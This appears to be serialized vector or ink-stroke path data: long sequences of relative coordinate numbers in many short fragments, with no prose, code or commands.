0,0-1 0,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,2 1 1,8 5 10,0 0 0,0-1-1,22 8 1,-33-14-20,29 12-88,-15-6-186,1 0-1,1 0 1,-1-2 0,25 5-1,-34-9-297,-1 0-1,0 0 1,1 0-1,-1-1 1,0 0-1,8-2 1,-6 1-806,-1-1 0,0 0-1,0 0 1,0-1 0,12-8 0,10-5-2094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19 792,'0'-3'553,"-1"-9"5716,1 11-6200,0 1 0,0 0 0,0 0 0,0 0-1,0-1 1,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1-1,0 1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-34 15 2576,23-12-2075,1 1 0,0 0 0,1 1 0,-16 10 0,10-3-61,5-6-339,1 1-1,-1 0 1,1 1 0,1 0-1,-1 0 1,2 1-1,-11 15 1,17-22-153,0-1-1,0 0 1,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0-1-1,1 0 1,-1 1 0,0-1-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 0 0,5-1-1,20 0-433,-1-2 1,0-1-1,0 0 1,0-2-1,48-18 1,-63 19-1499,1-1 1,-1 0 0,-1-1 0,1 0 0,-1 0 0,11-11 0,-8 1-1215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1 768,'0'0'70,"1"0"0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 1 0,0-1 0,-1 0 0,-4 22 2215,-6 26 200,11 112 1536,0 78-2534,11-206-1587,-18-26-3918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1748,'0'0'2777,"32"-6"2332,-16 5-3663,0-1 0,0 0-1,16-5 1,-16 3-844,1 1 1,-1 0-1,19 0 1,-18 3-447,-11-1-141,0 1 1,0-1-1,0 1 0,0 1 1,0-1-1,0 1 0,0 0 1,0 0-1,7 4 0,24 6-2176,2-10-4723,-28-1 4186,-1 0-839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10 139 96,'0'-2'11875,"0"3"-12196,0-1 466,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,4 2 1248,-1-1-1374,-2 3-14,0 300 941,-6-291-936,6-13-9,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,1 0 0,1-119 1028,-2 114-1024,0-4 3,0 0 0,0 0 0,1 0 0,0 0 0,1 0 0,3-13 1,-1 0-4,5-9-9,4-2 1,6-8 26,13-20 53,-26 54-81,0 0 1,0 1 0,1-1-1,-1 1 1,1 0-1,1 1 1,-1-1-1,1 1 1,0 1-1,0 0 1,0 0-1,1 0 1,-1 1-1,1 1 1,0-1-1,10 0 1,-13 3-4,1 0 0,0 1 0,-1 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 1 0,11 7 0,-16-10 8,1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 2 0,-32 26-23,26-23 12,-13 8-27,0-1 0,0-1 1,-1-1-1,-1-1 0,0 0 0,0-2 1,-36 8-1,27-6 42,10-2-33,7-3-2992,4-2-2510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 1428,'-3'-1'423,"1"1"-1,-1 0 0,0 0 1,1 0-1,-1 0 0,0 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 1,-1 0-1,1 0 0,0 0 1,-4 3-1,4-2-315,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0-1 0,1 6 0,-1-6-68,1-1 1,-1 0-1,1 1 1,-1-1-1,1 1 1,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,3 1-1,29 16 933,-21-12-609,-10-5-280,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,-1-1-1,1 1 0,-1-1 1,0 0-1,5-2 0,38-23 966,-32 17-861,-12 8-142,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1-3 0,0 4-21,1 1-3,-1 0-1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1-1,0 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,0 1 0,0-1-1,0 0 1,-41-41 917,39 41-905,0 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,-4 0-1,-16-5 336,21 4-337,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0 0 1,-1 0 0,1 1-1,0-1 1,-2 1 0,-9 0 93,11-1 133,0 1-255,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1 0 1,-1-1-1,0 1 0,1 0 1,-2 2-1,-2 3 10,5-7-14,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,0-1 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 1 1,0-1-1,-1 0 0,1 1 0,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0 0 1,-3 2-7,2-2 7,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1 0-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0 0,0-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1-1,-1-1 1,1 0-1,0 1 1,5 11-21,-6-11 17,0 0 1,0-1-1,0 1 1,0-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,0-1 0,1 1 1,-1-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,-1 0 1,2 1-1,1 3-367,7 8-1185,-9-12 1459,-1 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 0,-1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,9-10-6186,-8 5 3219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36 888,'0'0'107,"1"0"1,0 0-1,-1-1 0,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,0 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,-1-2 1,5-3 822,3-8 2872,-10 19-2154,2-5-1293,0-1 0,1 1 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 1 1,11 58 72,0-29-334,-1-9 61,-9-21-140,1 1 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,0 4 0,2-1-9,-2-4-10,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0 0,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1-1 1,0 1-1,0 0 1,0 0 0,0 0-1,0 2 1,1 11-572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1 244,'0'0'6759,"2"18"1697,4-17-8269,0 0 0,0 1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1 0 0,-1 0 0,0 0-1,0 0 1,-1 1 0,6 5 0,22 14 104,31 14-80,-54-30-276,8 5-552,-17-12 501,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0 0 0,0 0-1,1-1 1,-1 1 0,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0-1,-1-1 1,1 1 0,0 0 0,0-1-1,0-2-2569,0 2 2467,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,0-1 1,0 0-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 0-1,1 1 1,-1-1-1,2 0 1,-1 0-582,1-10-1384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25 532,'1'-2'258,"0"1"0,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,4-1 0,-5 2-154,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 1,-1-1-1,0 1 1,0-1-1,0 1 1,0 0-1,-2 5 327,0-1 1,-1 0-1,1 0 1,-1 0-1,0 0 1,-1 0-1,1-1 1,-1 1-1,0-1 0,-6 5 1,-14 19 854,-12 7-442,30-30-728,1 0 0,-1 0 1,1 1-1,0 0 1,-8 10-1,3-1 43,-2 0 1,1-1-1,-2 0 1,-16 14-1,13-13-117,0 2-1,-17 22 1,11-18-85,-1 2-44,9-7 63,13-15 19,-1 0 0,1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 3 1,0-3-192,3 2-1229,-2-3 1386,-1 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0-1,31-26-10877,-20 15 7825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 16,'0'0'3013,"10"-6"4772,-38 28-2838,-8 23-3198,3-3-994,-10 30 211,41-67-896,-1 0-1,1 0 1,0 0 0,0 0-1,1 0 1,-1 0-1,0 10 1,-5 14 210,0-11-111,4-13-115,1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,2 0 0,-2 10 0,-4 10 83,6-24-135,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 1,-1 1-1,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,1 0 0,3 9-17,1-2 1,6-2 113,21 8-1906,-31-15 1392,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 1,1-2-1,20-17-5848,-13 9 4078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55 684,'-11'18'3860,"13"-11"-3578,0-1 0,1 1 0,0-1 1,0 0-1,7 10 0,-4-11-144,0 0-1,1 0 1,-1-1 0,1 0-1,0 0 1,0 0-1,0-1 1,1 0 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0-1 1,-1-1-1,1 1 1,0-1 0,0 0-1,0-1 1,0 0-1,-1 0 1,1 0 0,13-5-1,-13 1-40,0 0-1,0 0 0,-1-1 1,13-11-1,-18 14 57,0 1 1,1-1-1,-1 0 0,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 0,1 0 1,-1-1-1,0 1 0,0 0 1,0-1-1,-1 1 0,1-5 1,-1 6-4,0 0 1,0 0 0,-1 0-1,1-1 1,-1 1 0,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,0 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,0 1 1,-1-2 0,-2 0 36,0 0 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,-7-2 1,6 2-161,0 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 1 0,1-1 0,-8 4 0,11-3-289,0 1 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 2-1,-2 4 1,3-4-962,0-1-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,0-1-1,-5 5 1,-3-1-1922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39 1008,'0'5'6621,"-8"8"-5061,7-12-1428,-1 1 1,1-1-1,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1-1 0,0 4 1,-9 41 1842,9-42-1839,1 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,1-1 0,-1 1 0,1 0 0,0-1-1,4 7 1,-2-7-78,0 0-1,0 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1-1-1,-1 0 1,1-1-1,0 1 1,5 0-1,0-1-6,-1-1 1,1-1-1,-1 1 0,1-2 0,-1 1 1,1-1-1,-1-1 0,0 1 0,0-2 0,0 1 1,-1-1-1,12-7 0,-18 10-47,1-1 0,-1 1 0,0 0-1,0-1 1,0 0 0,0 1 0,0-1 0,0 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,2-4 0,8-25 67,-11 23-11,0 7-35,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1-2 0,-2-23 505,-8 17-355,11 8-169,-1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1 1-1,1-1 1,-3 0 0,3 1 14,-1 0 1,1 0-1,0-1 1,0 1-1,0-1 0,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0-1-1,-2-1 0,-4-2 294,7 4-168,0 0-144,1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,-1 0 1,-25 1 55,18 0-48,6-1-11,0 1-1,0-1 1,-1 1-1,1 0 1,0 0-1,0 0 1,0 0-1,0 1 1,0-1-1,0 1 1,-3 2-1,-9 5-4,1-3-6,-6 6-7,0 8 28,19-20-7,0 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1-1 1,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,1 2-13,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,0 0-1,4 5 1,-5-6-149,0-1 1,0 0 0,-1 0 0,1 0 0,1 1-1,-1-1 1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1-1,1-1 1,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0-1,-1-1 1,1 1 0,2-2 0,17-10-8941,-10 6 5732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1 332,'10'-1'11009,"-18"16"-9014,7-13-1902,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 2 0,0 104 1162,11-78-1337,-11-28-154,1-1-1,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,3 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68 104 684,'-5'14'3646,"4"-14"-3614,1 0-1,0 1 1,-1-1 0,1 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,1 0 0,10 31 905,2-13-559,-12-16-348,0 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,0 0 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1-1 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0-1 1,0 0-1,4 1 0,0-1 77,0 1-38,-1-1 0,1 0 0,0-1 0,0 1-1,0-1 1,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1-1 0,9-4 0,4-3-36,1-1 0,-1 0 1,-1-1-1,0-1 0,19-20 1,-35 32 45,0-1-1,0 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1 0,-1-2-1,1 1 85,0 1-1,0-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 1 1,-1 0-1,0 0 1,-3-3-1,-14-6 889,14 8-876,1 0-1,-1 0 0,0 0 1,0 1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,-6 1 0,-5 2-91,1 1 0,-1 1-1,1 1 1,0 0 0,0 1 0,0 1-1,-28 17 1,37-20-93,0 0 1,1 1-1,0 0 0,0 1 1,0 0-1,1 0 0,-1 0 1,1 0-1,-6 11 0,10-12-374,0 1 0,0-1-1,0 0 1,1 0 0,0 1-1,0-1 1,0 0 0,1 7 0,0 7-6806,-1-13 4014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1076,'-9'-2'10311,"7"4"-9036,2 0-1041,0 0 1,0 1 0,0-1-1,-1 0 1,1 0-1,-1 0 1,0 1 0,1-1-1,-1 0 1,0 0-1,0 0 1,-2 2-1,-9 33 744,6-28-818,1 1 1,1-1-1,0 0 1,0 1-1,-2 12 1,2-10 38,0 0 0,0 0 1,-9 16-1,6-13-69,2 0 0,-1 1-1,2 0 1,0 0 0,1 0 0,1 0-1,1 0 1,0 1 0,1 21-1,0-28-108,0 1-1,1 0 1,4 20-1,-5-28-31,1-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0-1,1-1 1,0 1 0,-1 0 0,1-1 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0-1,0 0 1,1 0 0,-1 0 0,2 1-1,7 1-156,-10-3-143,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,-1-1-1,1 0 1,0 1-1,0-1 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,1-5-3469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11 231 184,'-10'0'3890,"23"1"3763,-5 0-4264,1-9-3497,3-5 151,0 2 0,0-1 1,1 2-1,26-17 0,15-22-5,-50 47-41,-1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0 0 1,3-5 0,20-19 16,-23 26-14,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1-1,0-1 1,0 1 0,0 0 0,-1 0-1,3-5 1,5 9 351,-8 0-106,-9 0-206,6-2 105,2 0-119,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,8 2 183,-16-1-115,6 0 141,3-2-119,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,1 0 0,-1 0-1,0 0 1,0 1 0,1-1-1,-1 1 1,1-1-1,2-1 1,-2 3-97,-4 1-58,1-1 41,1 1-1,-1-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 0,-1 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0 0-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 0,1-1 1,0 1-1,0 0 1,0-1-1,1 1 1,-1-1-1,0 1 1,0 0-1,0-1 0,1 2 1,-3 7-14,-2-2 36,1 1 0,-1 0 0,1 0 0,1 1 0,0-1 1,-2 13-1,-3 8 103,-14 79 437,19-99-537,0 0-1,1 0 1,0 0 0,1 0 0,0 0-1,2 15 1,0 9-20,-2-33-3,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 1,0 0-1,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-5-6-1656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36 144,'0'-8'13934,"0"-19"-3528,0 27-10335,0 0 1,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,-6 3-5134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2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11 776 268,'0'0'1171,"-1"12"3109,-1-13-4982,-2-2 3462,11 1 3909,-17 3-1700,10-2-4700,1-29 615,19-1-305,-19 28-549,-1 1 1,1-1-1,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,1 1 1,-1 0-1,0 0 0,1-1 0,-1 1 0,1 1 0,2-3 0,37-34 260,-4 4-107,-26 22-124,0 2 0,1-1 0,1 1 0,-1 1 0,1 0 0,21-10 0,91-33-23,-121 50-33,216-89-96,-195 82 101,4-1-17,46-24 1,-47 20 24,49-16 1,-46 18-43,27-11-47,48-15-263,-30 20 506,79-8-1,-22 5 130,-86 17-276,-39 4-23,0 0-1,0 0 1,0-1 0,0-1-1,0 1 1,9-4 0,5-2 1,1 2 1,0 0 0,1 2 0,29-2-1,39-5 39,-68 6-24,1 2 0,33 2 0,-33 0 97,0-1 0,33-5-1,57 0 312,-101 5-408,0 0 0,0 0 0,0 1 0,-1 1 0,15 3 0,-13-2 1,0-1 0,0 0 0,28-3 1,69-22 169,-84 16-95,0 1 0,1 2 0,56-4 1,84-3 61,-27 0 32,86 0 279,81 12 227,-307 0-690,8 7 11,3-1 7,2-1 158,0 0 0,0-1 0,0 0 0,1-2 0,-1 0-1,1 0 1,-1-1 0,31-3 0,-22 2 122,17 0-142,-39 0 27,-1 2-75,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,2 0 0,54 17 713,-47-16-513,6 2 58,-7-1 31,-11-2-205,-8 0-194,9 2 0,7-5 0,-4 5 0,6-2 0,2-1 0,0 1 0,10 9 0,-20-9 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 